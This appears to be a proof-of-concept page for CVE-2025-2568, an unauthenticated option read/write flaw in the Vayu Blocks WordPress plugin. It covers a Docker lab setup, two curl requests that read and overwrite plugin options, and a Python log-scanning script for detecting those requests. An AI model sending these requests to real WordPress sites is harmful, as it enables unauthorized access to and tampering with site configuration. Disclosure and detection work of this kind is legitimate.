Related vulnerability
Description
Proof of Concept for CVE-2025-2568
Introduction
# PoC CVE-2025-2568
### Overview
The **Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce** plugin for WordPress is vulnerable to **unauthorized access** to and **modification** of data due to missing capability checks on the `vayu_blocks_get_toggle_switch_values_callback` and `vayu_blocks_save_toggle_switch_callback` functions in versions `1.0.4` to `1.2.1`. This makes it possible for unauthenticated attackers to read plugin options and update any option with a key name ending in `_value`.
### Exploitation Steps
#### Setup (using docker)
1. Clone the repo and follow the steps:
```
cd vuln-wordpress
docker-compose up -d
```
2. Unzip the Vayu Blocks plugin inside the `wp-content/plugins` folder:
```
cd wp-content/plugins/
unzip vayu-blocks.1.2.0.zip
```
The Vayu Blocks plugin (version 1.2.0) is now installed.
#### Exploit:
1. Use this to read the options:
```
curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
```
2. Send a POST request like this to modify the option values:
```
curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
-H "Content-Type: application/json" \
-d '{"key":"container", "value":"new_value"}'
```
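For defenders, the two requests above leave a recognizable trace in web server access logs. The following Python script is an added example, not part of the original PoC repository: it assumes combined-format access logs, uses constructed sample lines, and goes slightly beyond the text by also matching the `?rest_route=` URL form that WordPress accepts alongside `/wp-json/`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Routes named in the write-up above (REST namespace vayu-blocks/v1).
ROUTES = {
    "/vayu-blocks/v1/get-toggle-values": "read",
    "/vayu-blocks/v1/save-toggle-switch": "write",
}
# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def rest_route(target):
    """Return the REST route for either URL style WordPress accepts."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if "/wp-json/" in path:
        # Pretty-permalink form, also when WordPress lives in a subdirectory.
        route = path.split("/wp-json", 1)[1]
    else:
        # Plain-permalink form: /index.php?rest_route=/namespace/route
        route = parse_qs(parts.query).get("rest_route", [""])[0]
    return route.rstrip("/").lower()

def find_hits(lines):
    """Yield one dict per logged request to the affected routes."""
    for line in lines:
        m = LINE_RE.match(line)
        kind = ROUTES.get(rest_route(m["target"])) if m else None
        if kind is None:
            continue
        status = int(m["status"])
        # 2xx: the handler ran and answered; 401/403: the request was refused.
        yield {"ip": m["ip"], "time": m["ts"], "method": m["method"],
               "kind": kind, "status": status, "served": 200 <= status < 300}

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2025:10:01:02 +0000] "GET /wp-json/vayu-blocks/v1/get-toggle-values/ HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '203.0.113.7 - - [12/Mar/2025:10:01:09 +0000] "POST /wp-json/vayu-blocks/v1/save-toggle-switch HTTP/1.1" 200 31 "-" "curl/8.5.0"',
    '198.51.100.4 - - [12/Mar/2025:10:05:00 +0000] "POST /index.php?rest_route=%2Fvayu-blocks%2Fv1%2Fsave-toggle-switch HTTP/1.1" 401 120 "-" "-"',
    '198.51.100.9 - - [12/Mar/2025:10:06:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Access logs do not record whether a request carried a valid session, so every `served` hit of kind `write` on a site running an affected version should be reviewed against the current values of options whose names end in `_value`.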
### Exploit Video
[wordpressexploit.webm](https://github.com/user-attachments/assets/45ac12b1-f6b1-4da3-8afa-eea4960c5212)
File snapshot
```
[4.0K] /data/pocs/66122289fdec62411eb88836af6d1b7387582dcc
├── [1.1K] LICENSE
├── [1.3K] README.md
└── [4.0K] vuln-wordpress
    ├── [ 571] docker-compose.yml
    └── [4.0K] wp-content
        └── [4.0K] plugins
            └── [2.6M] vayu-blocks.1.2.0.zip

3 directories, 4 files
```